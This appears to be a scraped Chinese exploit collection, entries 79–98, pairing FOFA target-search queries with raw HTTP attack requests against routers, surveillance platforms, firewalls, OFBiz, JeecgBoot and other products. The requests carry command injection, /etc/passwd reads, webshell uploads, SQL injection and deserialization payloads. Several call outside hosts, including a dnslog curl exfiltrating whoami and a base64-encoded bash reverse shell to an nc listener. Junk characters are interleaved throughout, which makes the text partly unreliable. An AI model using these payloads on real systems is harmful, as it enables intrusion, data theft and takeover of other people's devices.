/Applications/SkillDevelopAndEHS/+ S- A$ _4 Q. J% P7 m& F
------YsOxWxSvj1KyZow1PTsh98fdu6l--8 y$ A% q5 }$ {' O( G
# H1 G$ V( M- x/ k+ A/ T
% b1 J3 N" g- b. b& P( u g) QGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.18 v% _$ G1 e3 a" v3 R) w2 V! |
Host: x.x.x.x
" J' W/ d$ P! L" d
. r/ g. N4 J) D1 L$ G5 k' g: A% `9 b/ I
79. BYTEVALUE 百为流控路由器远程命令执行: t+ V0 ?, O8 `
FOFA:BYTEVALUE 智能流控路由器
6 O. |4 B8 L3 O P0 L( R4 f" ~ BGET /goform/webRead/open/?path=|id HTTP/1.1
" w1 N& m/ b" Y5 H3 oHost:IP; _" C3 P/ j+ z3 U+ d# k' F/ Q# g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0& J: P. ~( Y: |3 y* V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 C$ S3 A' b" v S3 U8 q! n4 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 l* P4 c: n! l' m0 nAccept-Encoding: gzip, deflate
. N( s: S" O; ^. W4 QConnection: close8 ?; `5 y8 i4 Q
Upgrade-Insecure-Requests: 1
% U; I: x( z9 N/ W T$ ^
' t& F2 Z3 ]% d8 G" l
, k; v" l" q9 L80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传# y) J9 ^6 I, H( x1 H' l
FOFA:app="速达软件-公司产品", m5 C }5 {5 g! w
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1! e# s: P8 q. x$ Z
Host: x.x.x.x
% q1 \9 v) }- _9 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ^. e9 |( w' k9 F3 j
Content-Length: 27
% p# F, j3 a" `3 o1 r0 [$ ?8 A1 z# rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( m! C, V4 Q7 T* G! n5 zAccept-Encoding: gzip, deflate
) v3 `7 d; B9 e; HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# K+ Q, Q4 R3 w, dConnection: close& d2 j" S! W- M; m5 W
Content-Type: application/octet-stream* C+ ?$ }9 ~6 V2 E4 u1 r
Upgrade-Insecure-Requests: 15 p2 Q2 ~" q$ |8 c9 N# j* m8 o% [: b, s
5 [9 g, ^# y, ~7 l6 T
<% out.print("oessqeonylzaf");%>3 ~* f' d$ ~ y s+ W$ q. K
; B$ `5 t) h1 ~6 Z" O0 p' n j, ~! G% ]
GET /xykqmfxpoas.jsp HTTP/1.1
7 l: R9 P- u; M8 ~; s0 Y# W- O7 VHost: x.x.x.x
1 U, W- I; W& n6 q; h( ^& ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! N" `- @1 d$ J& b zConnection: close
7 u2 m9 u& c1 \2 n( c: M1 k2 A7 UAccept-Encoding: gzip
6 u6 F! i$ C0 [; A6 {2 N* h! r4 E6 t
- e. i' R( L7 T* J$ H81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露' ?; G) |8 X% |
FOFA:app="uniview-视频监控"; ^( e0 z) b3 I
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1- U$ m5 b1 S9 T
Host: x.x.x.x* z# ^! S$ o% }0 K+ b0 U# h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 w% h2 s( ?# r0 W; \Connection: close
$ V4 b' X( Y1 ?0 b# n8 w. f1 NAccept-Encoding: gzip
/ s9 _4 y8 O) C8 @/ e5 P5 k+ w4 i
' ^% c/ O& s" ]: [* o) A/ J* M* K1 v2 Y
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
0 ^ f; t$ I. c. P: `: i kFOFA:app="思福迪-LOGBASE"4 x! ^; ^" V: B* \3 ^+ I( j
POST /bhost/test_qrcode_b HTTP/1.1
% @ f+ d' p: A, b6 W9 X5 NHost: BaseURL" N5 R+ _1 x3 \
User-Agent: Go-http-client/1.16 y3 ^4 F/ y/ {# ^8 T
Content-Length: 23
8 g) s1 l: k. J5 tAccept-Encoding: gzip
5 j6 i# l/ K& G5 MConnection: close
" V/ F/ \3 s/ _! l7 C/ @Content-Type: application/x-www-form-urlencoded; u# Y2 p9 i& P1 ~+ k( Q
Referer: BaseURL
# z8 l* c J; [% ?8 m( g
8 C& H! Q1 q; W( y Jz1=1&z2="|id;"&z3=bhost L: l5 O2 l3 D$ A% e' Q
& F; A: u! I; F0 I
, |: Q1 U5 w) @. C1 G; `
83. JeecgBoot testConnection 远程命令执行4 h: M. k" Q; G( T8 D* @' l0 i
FOFA:title=="JeecgBoot 企业级低代码平台"; q6 w: B! R+ K! H4 y' h! {
( l& R; y! i; Z6 B# M/ ]
I8 P1 i( T& l: n7 B O- _) h
POST /jmreport/testConnection HTTP/1.12 \- N: P8 v/ _1 O% f
Host: x.x.x.x
# p. K5 y6 j0 x! {2 d" \: T; ^2 Y5 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ r0 I( S+ S# f* \% ~
Connection: close
# v2 r& `, I& Q- I8 a ?6 |Content-Length: 8881
- B& F S$ C& l+ `2 L. S y p/ F4 ~Accept-Encoding: gzip. `) ]1 \& L* L; N
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO". E8 M( H$ W' R* l+ c
Content-Type: application/json
8 ?9 i& I. R& B1 |
1 v G- h/ V$ ePAYLOAD
/ N7 P. q+ F8 h
t% s: l' G: A# B! U84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
, ` P6 Z( }% }0 |FOFA:title=="JeecgBoot 企业级低代码平台"$ ^, u' S$ ]: ^( m* q/ j( P2 i9 v
! R/ D1 @ T8 |$ J3 p1 n
1 H- H4 Z! c( N$ P1 A) w& J. s+ \
) g/ P- Y/ w& ?% R1 n% cPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
" a# } {8 D* E, ]! ]8 V c8 b' [Host: 192.168.40.130:8080
* Y3 p% j- v* P9 ~! iUser-Agent: curl/7.88.1* F) i- a9 N- U3 @
Content-Length: 156
! l. D$ L7 ?' }3 B0 vAccept: */*
* R7 T$ y; c$ N1 |) oConnection: close- I' W4 M/ S l! G9 e6 h" s
Content-Type: application/json& t$ A% s4 u' L" n7 s
Accept-Encoding: gzip
$ q9 H( ]# F) ~& x- K: X/ x
% H, c2 P1 l& j* x{
' i% S9 y5 D9 W0 _/ z; g "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",4 x5 E1 P. @* ]
"type": "0") p/ e) ^; W, ]0 o) [" o7 S
}; L0 @1 C1 a6 ~, j4 E4 P
. M. j1 l" f# [% ?- v& z, i
' I/ U' y: v- D! V6 p3 X& g" |. ?85. SysAid On-premise< 23.3.36远程代码执行+ ^) n. m. k. d4 d* ^9 M- b
CVE-2023-47246
" K- }# e9 i. DFOFA:body="sysaid-logo-dark-green.png" , J$ \: K, X9 N( I7 c) S
EXP数据包如下,注入哥斯拉马
2 [% r1 h1 I! q2 MPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
3 t) q4 I7 L' S% [6 mHost: x.x.x.x K2 E& ~& D" C* t. {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% ^7 M& W# Q& K. t
Content-Type: application/octet-stream& S0 m8 ^" C8 Z( x1 t) `; g
Accept-Encoding: gzip/ E2 F/ \& o7 @
+ k. n. i/ x& p3 fPAYLOAD( A+ z$ y( S9 V+ l) l& ^
' y' r/ v+ g) A, N' K5 y4 ^% r回显URL:http://x.x.x.x/userfiles/index.jsp
" [# d5 ]6 F9 m1 H
0 ~+ v E8 ], K/ G2 `( r86. 日本tosei自助洗衣机RCE
3 j- `- ?! u2 O" g' M X# y8 XFOFA:body="tosei_login_check.php"
, I& S1 ]# ?0 J4 p' R" LPOST /cgi-bin/network_test.php HTTP/1.1
# N5 j5 f% m* j0 s; }; ^/ pHost: x.x.x.x
7 U/ L& {. x6 y, G# h- t1 DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( f" Q7 r" Z* e/ @' A( IConnection: close) L' J" u, E* P$ L
Content-Length: 44; M6 d# d5 y( m- z% Y; U# A
Accept: */*
- _4 ]9 c+ T+ E, }$ e8 y- @1 jAccept-Encoding: gzip
' ~3 q Y; H3 d# ^, dAccept-Language: en$ c# b6 }. B/ U' V+ ^+ ?8 u- y
Content-Type: application/x-www-form-urlencoded
. [* J/ ?3 K! R% N
/ b" L; G/ z! Q: hhost=%0acat${IFS}/etc/passwd%0a&command=ping: Q0 |5 K3 j9 e0 s
' G2 l# e! i1 u% Y
- Q$ \1 i8 G' ^1 x0 v6 T0 `" a, d87. 安恒明御安全网关aaa_local_web_preview文件上传. l9 X( g! J" }: s7 s% H+ T6 a9 x8 O3 b$ \
FOFA:title="明御安全网关"
+ {& L! S/ U8 g( t- }POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1) ]3 F4 Q! }5 O( |( u
Host: X.X.X.X
' f) m$ j. B, P: q5 B, sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 _( L/ I) o' v4 I+ x, u2 ~' g9 OConnection: close* i; f7 G2 c3 x: o r. `
Content-Length: 198/ a, s9 f6 f& q9 u4 H
Accept-Encoding: gzip$ T4 \- H. ^( Y& k- Y4 y. Z* |
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
' W* r# i2 }+ c# O% }( y/ ]5 S* s2 X4 y! k
--qqobiandqgawlxodfiisporjwravxtvd
3 n6 } ~7 l6 D. o' T" f P- {Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
# d, u; g6 A* N0 a9 I7 _2 dContent-Type: text/plain
7 p0 o+ i! Q: P' A- u
! H: X% y5 V4 V! x+ L6 ^2ZqGNnsjzzU2GBBPyd8AIA7QlDq
; V) s2 R0 j% @--qqobiandqgawlxodfiisporjwravxtvd--
; S' F8 d1 X4 u4 X" G
% ~- K1 _0 ?7 |" D% c* p, `" D* s* n* A: ]4 y
/jfhatuwe.php% \, d& l M& c# x* k' V
" f" Z5 s/ z- G88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
6 b" }. [4 D/ q$ j. D+ L0 UFOFA:title="明御安全网关"# H1 o9 U8 u, o V C8 _
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1- B$ B6 I" M# U: x. F: F |
Host: x.x.x.xx.x.x.x
2 ^0 h# c8 r1 r7 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) r2 X# V$ U: ^; ?0 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 H3 B. |4 q7 \$ r
Accept-Encoding: gzip, deflate" U# L8 I! N2 y$ T& s3 F0 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 U0 l+ r! @! C! M. ~& vConnection: close: a2 [9 c2 Y9 g
/ M- K8 H8 Q6 I: N; f
) g, z3 n9 i. f6 ?5 d; L/astdfkhl.php* k+ A/ S$ H& I
/ O+ \7 W2 J% G8 `' H% U
89. 致远互联FE协作办公平台editflow_manager存在sql注入4 b8 ]& R1 c: L6 M, e" |! U J3 O
FOFA:title="FE协作办公平台" || body="li_plugins_download"
; p( k( N1 ^. u5 M- N+ \POST /sysform/003/editflow_manager.js%70 HTTP/1.1
& M& ?7 t1 A3 V& Y) AHost: x.x.x.x( e( g1 J' K ]9 N2 Z4 K2 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 T) K9 ]" W* H3 e; H
Connection: close/ `7 Q c: B- M- i% m5 ?
Content-Length: 41
- |0 T4 K! _4 T* e" p! ~Content-Type: application/x-www-form-urlencoded5 J# z3 W' N2 G0 D7 k0 \
Accept-Encoding: gzip3 Z& M: ~: L' O/ G
' c* _2 f( o& y% S; u
option=2&GUID=-1'+union+select+111*222--+
+ F; F8 f( t. }, E; J! ^: e* `( u% f: J
) G. P& d* L% d, ?1 m0 Z
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行6 O8 H3 V/ z. s( l* ], E
FOFA:icon_hash="-1830859634"
: ?; g1 L0 [+ Y3 L+ b0 O* Y* G% jPOST /php/ping.php HTTP/1.1
5 V u$ a. m7 xHost: x.x.x.x
4 f3 a$ I# P. ^! bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.04 ]* I6 n: `5 K' ^. v+ K$ c- s5 S
Content-Length: 51/ V, q/ _. ~9 G/ }
Accept: application/json, text/javascript, */*; q=0.01, O u# N. \2 _, u( q! @
Accept-Encoding: gzip, deflate
+ S! i: F( F/ o5 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 h: Z5 [" ~' XConnection: close
( |. N7 r8 ]. _& _( u' x+ LContent-Type: application/x-www-form-urlencoded6 W3 j: ?, z7 B9 s; _+ h) R- q
X-Requested-With: XMLHttpRequest
2 x" J6 t2 T: W3 b& J: u: x( h& [* \
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig W1 j! ~4 o& {, v2 a7 \" ?
' k4 u5 Z4 z# q: ~/ n* `% B( I. u- Y' Z7 V! t
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
$ x5 q/ y8 v2 E3 OFOFA:title="综合安防管理平台"
: R0 O: o, M( z$ ^GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1 A# I5 V e2 u) V5 N1 q
Host: your-ip
. u7 @9 }$ T2 ?: a0 m9 @/ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; e! J# {% r8 ~% ]Accept-Encoding: gzip, deflate
+ w, d2 ~5 x" n2 X! ZAccept: */*
6 e$ a" i/ o2 G, K: @, r qConnection: keep-alive
' @8 }# n$ ~8 Y% f5 m9 |3 H- G% _% }
* J# H" X4 Z9 D/ b0 L6 b
8 m; I, K7 S0 m
2 e( K {. M1 u6 G s/ H92. 海康威视运行管理中心session命令执行
2 [! N6 C0 ~" z* p) \3 ~# \Fastjson命令执行
( e+ n! |" v2 c Khunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
. H- X+ x) W# a# R* N+ MPOST /center/api/session HTTP/1.1
% t& l0 U+ Q' vHost:
3 L% Z$ a" F8 q; [4 V* ~Accept: application/json, text/plain, */*
! q9 z7 {, v! j4 s. x: i8 Y$ T$ uAccept-Encoding: gzip, deflate9 s3 ~& G) F/ W7 @# b! U
X-Requested-With: XMLHttpRequest
" b6 M4 K, Q, {. l% SContent-Type: application/json;charset=UTF-8) w/ u2 m6 `; w6 W6 a0 w. K
X-Language-Type: zh_CN
: r' \4 W' C+ v1 w) l$ RTestcmd: echo test
! [1 N" `1 ?: XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
" M% u, r: L3 S! S2 w c4 v; AAccept-Language: zh-CN,zh;q=0.91 Y% W* ]& q3 C/ s: S- e/ W
Content-Length: 5778
3 T8 |$ [" a. }- L) p) Y8 q# L5 p+ Y( ?: f
PAYLOAD' F+ z/ a6 @1 [" y( W8 R% |0 U
/ v% I9 d! q& ~ v- u# c" T% ^4 L! ?
% c) x) O3 F. Y5 k" r& [5 S
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传& U/ L( p0 M( _
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
( B# F, w6 n' D6 e k% v' g$ EPOST /?g=app_av_import_save HTTP/1.1. V2 _9 T; Z9 N: N% L0 X
Host: x.x.x.x
+ a6 x6 F9 b! x; F+ K/ iContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx5 K5 d1 ^1 e4 \" G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 @; A) z C0 G9 ]4 o/ i% e- x
- V8 @6 D. O& M------WebKitFormBoundarykcbkgdfx
) Q4 b6 V; }2 X4 \' n0 G) XContent-Disposition: form-data; name="MAX_FILE_SIZE"1 x: L. f3 ~" `. b
; S1 U6 Z: D7 M, Q: J4 K1 `10000000( k" m% c3 k6 [! v M- o
------WebKitFormBoundarykcbkgdfx
2 Z6 \0 ?1 _+ w0 F* Y4 x; r% V2 N5 dContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"; V2 M0 s. P& S# i
Content-Type: text/plain, }3 ^- O+ ]& N. d5 E7 Q; p9 B* a
9 u; R$ f6 ~+ R
wagletqrkwrddkthtulxsqrphulnknxa3 `! t$ R$ b5 t/ O1 a% w7 d
------WebKitFormBoundarykcbkgdfx
( w( i2 q' k4 e$ R/ z& ~+ A3 |5 [Content-Disposition: form-data; name="submit_post"# |- j+ p& ^& d: D7 D* w6 B/ c D
- G0 Q. {$ E6 wobj_app_upfile' y8 F) O, C& m
------WebKitFormBoundarykcbkgdfx4 p$ s; w. d2 _2 l7 W: s) l3 _
Content-Disposition: form-data; name="__hash__"
- V8 G+ G$ n7 m! ] R, M$ K: ~* K1 s0 _( L/ P/ ]
0b9d6b1ab7479ab69d9f71b05e0e9445/ d4 S" _+ Z8 C7 N
------WebKitFormBoundarykcbkgdfx--
9 @* W9 J5 `- ?$ x
. @+ o- w: J. N0 B ~9 N# Y, E9 D. d1 q6 R8 A1 G8 K& e
GET /attachements/xlskxknxa.txt HTTP/1.1
; Y$ d& B; L( ]8 |Host: xx.xx.xx.xx
1 O1 L' w8 ~# x+ tUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% |+ \9 u! {, y+ w, s6 e
+ p7 c2 h/ L: g9 @6 Z; C2 E A# Z0 a* m( c" P9 ]7 z/ R8 t1 S
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
4 h" D& H) w- c% ~8 s# @FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="2 J- T! e2 V# W8 v0 a" H
POST /?g=obj_area_import_save HTTP/1.14 a+ L. F2 m- `' ^% Y
Host: x.x.x.x/ p% Z9 [ r5 i4 W/ r* h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt! L% p/ x$ c/ E( ] s" O( x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 S; i6 c( G5 [
* G9 N5 U- J7 {+ h8 ?
------WebKitFormBoundarybqvzqvmt
! [* [; ]1 C: w, M; L1 Q, V, B7 IContent-Disposition: form-data; name="MAX_FILE_SIZE"$ D. N; ~& s6 H+ V2 V
0 o' @+ k+ Y: P3 t+ o
10000000, \* n0 G/ h# F6 u5 i
------WebKitFormBoundarybqvzqvmt3 @5 F5 J0 B [" v+ p( Z( g) j
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
9 _; D* N( J. E% r3 n/ ?Content-Type: text/plain; F+ [. M3 F7 X# V( G. M% X9 D. ^
`+ I. V: j# d2 r* Lpxplitttsrjnyoafavcajwkvhxindhmu
+ Z2 x6 s( ]9 \- a/ A9 h8 v0 y------WebKitFormBoundarybqvzqvmt! @: s7 Q# M, B: u S7 E( W. D8 }
Content-Disposition: form-data; name="submit_post"
+ ~( g( x7 W5 t5 c% B: W% n9 k0 d. a) \: W# c+ N
obj_app_upfile, O- M7 K" ^, p8 u
------WebKitFormBoundarybqvzqvmt. k8 ^. P- M8 U3 W! Z) g/ [( B$ f6 W' p
Content-Disposition: form-data; name="__hash__") P$ b2 n& e4 U) B9 D
6 E( ?4 Q2 W4 E% j) {$ ]: R
0b9d6b1ab7479ab69d9f71b05e0e94456 Q( n4 w9 ?" z4 F8 Q
------WebKitFormBoundarybqvzqvmt--! Y& X/ W x8 ]# Y# Y+ i: W
; b& y K. Q7 O" U: ~* d
; A) _; k' W/ F& z- @" u
5 y! K' y% O2 r5 g5 n: vGET /attachements/xlskxknxa.txt HTTP/1.1" F& _9 f- @5 p# g3 E O
Host: xx.xx.xx.xx1 G6 j: j9 P5 g- S' s. o( Q3 P0 n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 n0 }& e/ ?1 N, o. q! a
* W; K# }5 G- j7 g: u
7 R7 ]5 n k5 g, z9 W; z
1 q) s1 y2 t, H$ R95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
* d( a7 z) ]7 l P6 yCVE-2023-49070/ T. i( B9 {; a
FOFA:app="Apache_OFBiz"
7 ^: J& I, C4 D" m, Z* fPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 z7 G2 o9 q4 e7 M8 }' O5 ~' q
Host: x.x.x.x9 k: K( c5 ^ M) e" D3 ^5 R* j5 f' P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' u+ p1 ~4 R$ o6 A8 J6 m9 \0 l
Connection: close$ f3 H( F* S6 Z1 {$ {" M
Content-Length: 889/ J' y2 E. e1 N3 |' [& J! b' E+ N
Content-Type: application/xml, Z: y }! k8 t. o) x
Accept-Encoding: gzip
# L& D. z4 a1 Y# d6 y" J3 b- [/ Y! t7 `
<?xml version="1.0"?>6 X$ Y4 W$ M$ S! ]+ m
<methodCall>
, ^+ r8 w# c1 l/ v* W <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>; t/ E+ a7 T7 L5 R
<params>
! N+ y- R# M: Q, R G <param>! C0 ^0 b+ P' y9 j! X' W- Z
<value>8 `6 K) ]: @- L# A, h; z1 `4 u
<struct>
! J5 I9 h$ y; i( b, l4 O' g <member>( N5 V9 p ~- a3 A. G1 X
<name>test</name>" {# R5 ~. ~" B$ v
<value> z4 F8 ^1 {$ j" @4 o+ r& F
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
4 x% y& K* L5 F* y+ k9 s! ]7 \* O </value>
$ ]7 Y: f7 d3 T7 [8 ~! l2 s </member>
2 P' y; x' r# p9 v7 F0 h* H* V </struct>
. }6 w, g) J3 f% Q9 u </value>: o$ K; c! m. N- L) c
</param>+ d! x; z+ X3 g5 Z- ^- g
</params>6 M1 \4 q6 P9 g" S) W4 J. E2 p5 a
</methodCall>
- c, E+ o7 o j5 Q& x- b& l% @1 s& k7 r
# J1 v: e- t/ { y1 ?" S( e5 @
用ysoserial生成payload
2 `. h4 Z; z1 L& ojava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
! B& H) r4 _4 O: d0 L3 d; z; E# L& ]2 e3 u P; z1 E* n9 S( J9 h
) ?3 |1 y4 g7 Y3 V' Q将生成的payload替换到上面的POC
* p+ ^& g4 S1 p) Q( N L, y: _7 M" bPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1* E6 ]1 ~1 y' D9 v( M
Host: 192.168.40.130:8443
# f2 E" i3 r, s6 r7 `; MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) k2 J5 N* ^9 s
Connection: close
" y- h3 @# W* ~: IContent-Length: 889
" P! Q3 b% |8 `Content-Type: application/xml# k, S4 F8 x. v0 V
Accept-Encoding: gzip! ?3 G* g; e2 {, M( H8 ]; R
, P; i$ u# h( {9 X+ M- U
PAYLOAD* l; e/ z e& [5 g1 c
6 h) n+ a) _5 z$ g' I7 X
96. Apache OFBiz 18.12.11 groovy 远程代码执行
6 b' ?8 y _, L+ iFOFA:app="Apache_OFBiz"
7 q8 c- W( K @4 c2 gPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
& ~& E M! n; N$ Q0 LHost: localhost:84439 i, T9 {6 W8 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 @! d1 w, w4 {) d4 }. V
Accept: */*
' h, f. L! \/ w% `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- z$ p/ ^$ X- i' \: s* LContent-Type: application/x-www-form-urlencoded5 k9 i& ^! Y6 ?6 s" J: b' _
Content-Length: 55' |0 U1 l1 k% v4 e& u1 O. y+ b
4 A2 F9 @! V" r8 L0 \* j2 z6 `5 Z/ P
groovyProgram=throw+new+Exception('id'.execute().text);
9 H. }& A3 |( ]8 T) [; ^# A
: _, ~0 }8 Y! o3 _% l
8 L- |' I; f: G2 q& B反弹shell
) E D# g0 B8 o; s3 V8 d在kali上启动一个监听 s+ `( d! C4 C3 d( Y8 U4 z8 Q! l
nc -lvp 7777, Z: [ n- R' W% k& X% y2 L% H: _
3 f: v: ~& N5 Z3 Y* W
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
; e9 _0 U/ F" s! h0 B* L# s# RHost: 192.168.40.130:84434 I! u( @5 j$ H1 x5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 f/ {: k1 H, L2 ~
Accept: */*
9 ^$ w0 @: n- E5 V1 |" J+ KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! {5 c/ Q1 r, k1 D6 ?/ _; b1 z5 fContent-Type: application/x-www-form-urlencoded
/ h b) ^: p0 \3 {# E3 JContent-Length: 71
" S$ Y/ q8 s" \0 }; v9 P" V2 O& y, N4 O: B4 i8 r+ Z5 _) Q- U
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();) m* Q; O- U9 M
0 k. }+ ^& P) I b& @$ s Y
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行* l, t: p1 e' k2 J% I
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
' x+ B4 Q2 W7 b5 K% v( I( @GET /passport/login/ HTTP/1.1- ]* |/ N! c G/ q5 G7 Z
Host: 192.168.40.130:8085
3 g h2 J1 L2 W7 \2 u% tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 Q: ^* x0 E% n4 `5 B# F% S: HAccept-Encoding: gzip
* O) {( C! Z$ _! Y* eConnection: close# s. {: f! f$ {7 h! @. u
Cookie: rememberMe=PAYLOAD
$ g2 z* t8 v; }. g5 MX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
( i/ I$ c1 [) ]5 ?6 ^
+ O/ f% p1 \9 g8 p- b" O u5 z( ?% Q+ M, ^: C
98. SpiderFlow爬虫平台远程命令执行
9 m5 Z3 T. g9 p3 ?5 Z; N$ {CVE-2024-0195
/ v ] p3 \. S% X9 u0 g8 {' o, jFOFA:app="SpiderFlow"
) T% h0 V6 ]3 S. `, T% `2 _) QPOST /function/save HTTP/1.1- ^& |! X8 G1 {; M8 J
Host: 192.168.40.130:8088
3 ]5 b. N' [8 c$ a5 c9 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 U: N& e* u0 S
Connection: close
